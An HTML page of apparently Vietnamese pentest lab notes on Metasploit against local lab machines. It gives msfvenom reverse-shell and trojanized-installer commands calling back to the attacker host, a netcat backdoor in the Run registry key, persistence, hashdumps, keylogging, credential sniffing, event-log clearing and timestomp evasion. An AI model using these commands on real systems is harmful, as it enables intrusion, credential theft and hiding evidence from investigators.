
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>MSF PENTEST REPORT</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">MSF PENTEST REPORT</h1>

<p>TOPOLOGY</p>
<p>Kali 192.168.44.128</p>
<p>me2 192.168.44.129</p>
<p>win  192.168.44.130</p>
<p>Ubu 192.168.44.132</p>
<p>RECON</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_1.png" /></p>
<p>db_nmap -sS -sV -Pn -p- 192.168.44.129,130,132</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_2.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_3.png" /></p>
<p>ANALYZE SMB</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_4.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_5.png" /></p>
<p>set rhosts</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_6.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_7.png" /></p>
<p>Attack smb ms17</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_8.png" /></p>
<p>Smb login:</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_9.png" /></p>
<p>Bruteforce smb</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_10.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_11.png" /></p>
<p>Kết quả: vagrant: vagrant</p>
<p>MYSQL recon</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_12.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_13.png" /></p>
<p>Mysql version</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_14.png" /></p>
<p>Mysql login</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_15.png" /></p>
<p>Truy vấn DB</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_16.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_17.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_18.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_19.png" /></p>
<p>Authenticated Code Execution in Axis2 Business</p>
<p>Trên máy metas3 2k8 có chạy dịch vụ apache ( metas3 lỗi trên vmware không open port 8282 nên sẽ demo trên virtualbox)</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_20.png" /></p>
<p>Sau khi quét được version thì search gg ra cve, sau đó search lại ở msf</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_21.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_22.png" /></p>
<p>FTP</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_23.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_24.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_25.png" /></p>
<p>Đăng nhập ftp không cần password</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_26.png" /></p>
<p>FTP BACKDOOR</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_27.png" /></p>
<p>Post exploit  ftp - hashdump</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_28.png" /></p>
<p>Evade firewall</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_29.png" /></p>
<p>sudo msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 -f exe LHO= 192.168.44.128 LPORT=4447 -o eva.exe</p>
<p>ATTACK RMI JAVA</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_30.png" /></p>
<p>Xem thêm thông tin</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_31.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_32.png" /></p>
<p>Exploit</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_33.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_34.png" /></p>
<p>Đẩy exploit vào stack</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_35.png" /></p>
<p>Exploit rmi server</p>
<p>Web Crawler trong MSF – HTTP và cách upload safe BACKDOOR<img alt="" src="../media/MSF%20PENTEST%20REPORT_36.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_37.png" /></p>
<p>services -s http -O 2</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_38.png" /></p>
<p>Set host, port in crawler</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_39.png" /></p>
<p>Kích vào link uploads – 0 có file nào</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_40.png" /></p>
<p>Tấn công http upload file</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_41.png" /></p>
<p>Tạo và upload backdoor lên Server</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_42.png" /></p>
<p>Enum ra được đường link uploads file</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_43.png" /></p>
<p>SNMP ENUM</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_44.png" /></p>
<p>TẠO PHP UPLOAD BACKDOOR</p>
<p>msfvenom -p php/meterpreter/reverse_tcp -f raw LHO= 192.168.44.128 LPORT=8585 -o nweb.php</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_45.png" /></p>
<p>Khai thác</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_46.png" /></p>
<p>1 cách khác để upload file</p>
<p>curl -T "/home/kali/Desktop/newweb.php"</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_47.png" /></p>
<p>Vào link kiểm tra</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_48.png" /></p>
<p>Kiếm payload reverse shell</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_49.png" /></p>
<p>Chạy payload và kích vào file vừa mới upload để lấy reverse shell</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_50.png" /></p>
<p>SMTP Recon</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_51.png" /></p>
<p>KHAI THÁC</p>
<p>Eternal blue</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_52.png" /></p>
<p>Set rhost and payload</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_53.png" /></p>
<p>Reverseshell – lang nghe port tren may nan nhan va may nan nhan se gui ve may tan cong</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_54.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_55.png" /></p>
<p>EXPLOIT JENKIN</p>
<p>Mở msfconsole và dùng lệnh: Services -s http</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_56.png" /></p>
<p>truy cập ip:port</p>
<p>dùng lệnh</p>
<p>def sout = new StringBuilder(), serr = new StringBuilder()</p>
<p>def proc = ‘ipconfig'.execute()</p>
<p>proc.consumeProcessOutput(sout, serr)</p>
<p>proc.waitForOrKill(1000)</p>
<p>println "out&gt; $sout\nerr&gt; $serr"</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_57.png" /></p>
<p>Exploit Jenkins với msf</p>
<p>Set rhosts,rport, target uri</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_58.png" /></p>
<p>Bruteforce ports</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_59.png" /></p>
<p>Tao file</p>
<p>msfvenom -p windows/meterpreter/reverse_tcp_allports  LHO=192.168.44.128  -f exe --platform windows -o  eva.exe</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_60.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_61.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_62.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_63.png" /></p>
<p>Dùng Script tự động tấn công kiểm định System</p>
<p>Dùng lệnh makerc /home/kali/Desktop/scan-ms17.rc để lưu lại các command đã dung trên msf</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_64.png" /></p>
<p>Dùng lệnh resource /home/kali/Desktop/scan-ms17.rc để chạy tự động</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_65.png" /></p>
<p>TẤN CÔNG đi sâu vào Advanced Privilege Escalation Memory</p>
<p>Khai thác lỗi eternal blue</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_66.png" /></p>
<p>Đã thành công nhưng chưa chiếm full quyền</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_67.png" /></p>
<p>Gõ ps để xem các process, dùng migrate pid explorer.exe nhưng 0 thành công</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_68.png" /></p>
<p>Sau khi dùng các payload post exploit 0 thành công thì down sysret về.</p>
<p>sau đó, upload file lên máy window. Rồi migrate</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_69.png" /></p>
<p>Sau khi chiếm full quyền thì có thể dung các lệnh như hình dưới</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_70.png" /></p>
<p>Dùng module hashdump để lấy hash password của các acc trong win</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_71.png" /></p>
<p>Sau khi dump password thì dung john để crack hash.</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_72.png" /></p>
<p>Một số tài khoản sau khi lấy được pass</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_73.png" /></p>
<p>Dùng MSF Mạo Danh Token chiếm quyền Administrator System</p>
<p>Load incognito để load các msf  Mạo Danh Token. Sau đó list token để  xem các token của user. Delegation tokens: token được quỷ quyền</p>
<p>Imersonation tokens: sinh ra để mạo danh thông qua ssh, rdp,..</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_74.png" /></p>
<p>Thực hiện mạo danh token</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_75.png" /></p>
<p>Chụp màn hình</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_76.png" /></p>
<p>Bí mật Remote Desktop User trên Server mà không bị log out</p>
<p>Dùng lệnh run getgui -u <user>  -p <pass></p>
<p>Lệnh này sẽ tạo user mới add vào trong hệ thống để rdp mà 0 chiếm sessions của user hiện tại</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_77.png" /></p>
<p>rdesktop -u hiep -p 1234 192.168.44.132</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_78.png" /></p>
<p>Search Critical Analyze – info SRV – download phân tích</p>
<p>run  post/windows/gather/enum_files FILE_GLOBS=<em>tomcat</em>.xml SEARCH_FROM=C:\</p>
<p>module này sẽ kiếm các file liên quan tới tomcat xml từ ổ C và tự động download về máy</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_79.png" /></p>
<p>Áp dụng WIRESHARK cùng MSF tấn công theo thời gian thực</p>
<p>Migrate leo thang rồi load module sniffer</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_80.png" /></p>
<p>Xem interface, capture</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_81.png" /></p>
<p>Nhập thông tin đăng nhập ở máy mục tiêu</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_82.png" /></p>
<p>Tắt sniff và lưu file</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_83.png" /></p>
<p>Bật wireshark thì capture được thông tin đăng nhập</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_84.png" /></p>
<p>Dùng Port Forwarding khai thác thông tin System</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_85.png" /><img alt="" src="../media/MSF%20PENTEST%20REPORT_86.png" /></p>
<p>TẤN CÔNG Registry để giữ kết nối vĩnh viễn sau khi thâm nhập system</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_87.png" /></p>
<p>Up backdoor vào máy bị tấn công</p>
<p>upload /home/kali/Desktop/nc.exe C:\Windows\System32</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_88.png" /></p>
<p>reg enumkey -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</p>
<p>reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ -v backdoor -d 'C:\Windows\System32\nc.exe -Ldp 4449 -e cmd.exe'</p>
<p>reg queryval -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ -v backdoor</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_89.png" /></p>
<p>Cách này không hoạt động khi hệ thống đã vá lỗi</p>
<p>Key logging trong MSF</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_90.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_91.png" /></p>
<p>TẤN CÔNG và giữ kết nối vĩnh viễn với Advanced Meterpreter Wormhole</p>
<p>Cách tấn công này giúp tạo 1 process tự động chạy trên máy mục tiêu, giúp vẫn truy cập được hệ thống khi hệ thống đã vá lỗi</p>
<p>run persistence -X -p 442 -i 5 -r  192.168.44.128</p>
<p>-X : tạo agent trên máy mục tiêu</p>
<p>-i: thời gian</p>
<p>-r: nhập ip máy kali tấn công</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_92.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_93.png" /></p>
<p>msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.44.128  LPORT=442 -f exe -a x86 --platform windows -o  persis.exe</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_94.png" /></p>
<p>use exploit/multi/handler</p>
<p>set payload windows/meterpreter/reverse_tcp</p>
<p>set LHOST 192.168.44.128</p>
<p>set LPORT 442</p>
<p>exploit</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_95.png" /></p>
<p>Tạo persistence bằng meterpreter</p>
<p>run post/windows/manage/persistence_exe REXENAME=persis.exe REXEPATH=/home/kali/persis.exe STARTUP=SYSTEM</p>
<p>bg</p>
<p>options</p>
<p>exploit</p>
<p>Sau khi tạo persistence thì dù khởi động lại exploit thì vẫn có thể kết nối lại bằng nc hoặc qua module:  exploit/multi/handler</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_96.png" /></p>
<p>PERSISTENCE PART 2:</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_97.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_98.png" /></p>
<p>Set exploit multi hander để tạo lisenter – tương tự nc</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_99.png" /></p>
<p>Đóng gói Virus vào trong Software Hợp Pháp để tạo kết nối vĩnh viễn</p>
<p>Tạo file malware tích hợp vào trong 1 phần mềm bình thường:</p>
<p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=445 --platform windows -a x86 -f exe -x /home/kali/Desktop/UniKeyNT.exe -k -o /home/kali/Desktop/1UniKeyNT.exe</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_100.png" /></p>
<p>Sau đó dùng python để down về máy bị tấn công</p>
<p>Trên máy tấn công dung exploit/multi/handler để bắt lại quyền truy cập vào máy tấn công</p>
<p>Dùng câu lệnh:</p>
<p>set AutoRunScript 'post/windows/manage/migrate NAME=explorer.exe SPAWN=false'</p>
<p>để tự động chạy script khi session được khởi tạo.</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_101.png" /></p>
<p>Sau đó chạy file exe trong máy bị tấn công. Và đợi session được mở.</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_102.png" /></p>
<p>XÓA DẤU VẾT chứng cứ sau khi TẤN CÔNG HỢP PHÁP</p>
<p>Dùng 2 lệnh sau để xóa window event log được sinh ra trong lúc tấn công:</p>
<p>Clearev</p>
<p>run event_manager -c</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_103.png" /></p>
<p>Chỉnh sửa chứng cứ để qua mặt Security Analyst điều tra</p>
<p>Xem metadata của file:</p>
<p>timestomp  c:\wamp\www\testmysql.php -v</p>
<p>Đè metadata của file khác vào file mình cần che dấu:</p>
<p>timestomp  c:\wamp\www\testmysql.php -f  c:\wamp\www\meterpreter.php</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_104.png" /></p>
<p>Thay đổi từng metadata:</p>
<p>timestomp  c:\wamp\www\testmysql.php -a "12/16/2020 12:00:17"</p>
<p>tương tự  -m,-e, -c để thay đổi các phần còn lại</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_105.png" /></p>
<p>SMB ENUM</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_106.png" /></p>
<p>SCAN SERVICE:<img alt="" src="../media/MSF%20PENTEST%20REPORT_107.png" /></p>
<p>SCAN HDH CỦA MÁY CLIENT:</p>
<p>nmap --script smb-os-discovery.nse -sV 10.50.150.158</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_108.png" /></p>
<p>Enum user thông qua rid: enum4linux -r 10.50.150.158</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_109.png" /></p>
<p>get password policy information: enum4linux -P 10.50.150.158 <img alt="" src="../media/MSF%20PENTEST%20REPORT_110.png" /></p>
<p>Get user list and detail:  enum4linux -U -d 10.50.150.158</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_111.png" /></p>
<p>Từ cái này thấy được tài khoản 0 bị khóa, pass 0 hết hạn, có thể bruteforce được</p>
<p>Get share list: enum4linux -r 10.50.150.158</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_112.png" /></p>
<p>Ở đây share Josephine đáng chú ý. Có thể có khả năng truy cập 0 cần mk</p>
<p>Dùng smbmap để xem quyền : smbmap -H 10.50.150.158</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_113.png" /></p>
<p>Giờ chúng ta có thể xem được quyền smb. Có thể crack acc smb bằng:</p>
<p>crackmapexec smb 10.50.150.158   --shares -u ‘’ -p ‘’</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_114.png" /></p>
<p>Truy cập vào thư mục được share: smbclient //10.50.150.158/osephine</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_115.png" /></p>
<p>Sau đó get file về</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_116.png" /></p>
<p>Tài khoản này có thể là tk ssh:</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_117.png" /></p>
<p>Sau đó, tải linpeas về máy tấn công</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_118.png" /></p>
<p>Rồi tạo web server: python -m SimpleHTTPServer</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_119.png" /></p>
<p>Bên máy ssh thì rồi wget tải linpeas từ máy tấn công về rồi chạy.</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_120.png" /></p>
<p>Tìm thấy được khá nhiều thứ có thể khai thác</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_121.png" /></p>
<p>Bài này dễ nên sẽ dùng cách đơn giản hơn</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_122.png" /></p>
<p>Có tài khoản root</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_123.png" /></p>
<p>Lên quyền root</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_124.png" /></p>
<p>PIVOTING</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_125.png" /></p>
<p>Sau khi biết có vcms thì search trên msf</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_126.png" /></p>
<p>Leo thang nếu chiếm quyền thấp</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_127.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_128.png" /></p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_129.png" /></p>
<p>Xem ip</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_130.png" /></p>
<p>Autoroute</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_131.png" /></p>
<p>Tiến hành scan các port trên network mới</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_132.png" /></p>
<p>Tạo portfw</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_133.png" /></p>
<p>Scan service vào khai khác</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_134.png" /></p>
<p>TẠO SHELL VỚI MSFVENOM</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_135.png" /></p>
<p>VỀ REVERSE_TCP LÀ STAGED PAYLOAD. VÌ VẬY CẦN THÊM 1 LISTENER RIÊNG.  Tham khảo hình dưới</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_136.png" /></p>
<p>Sau đó, chạy file backdoor vừa tạo để lấy reverse shell</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_137.png" /></p>
<p>Stageless như hình dưới thì netcat có thể bắt được. còn staged thì nc không bắt được.</p>
<p><img alt="" src="../media/MSF%20PENTEST%20REPORT_138.png" /></p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
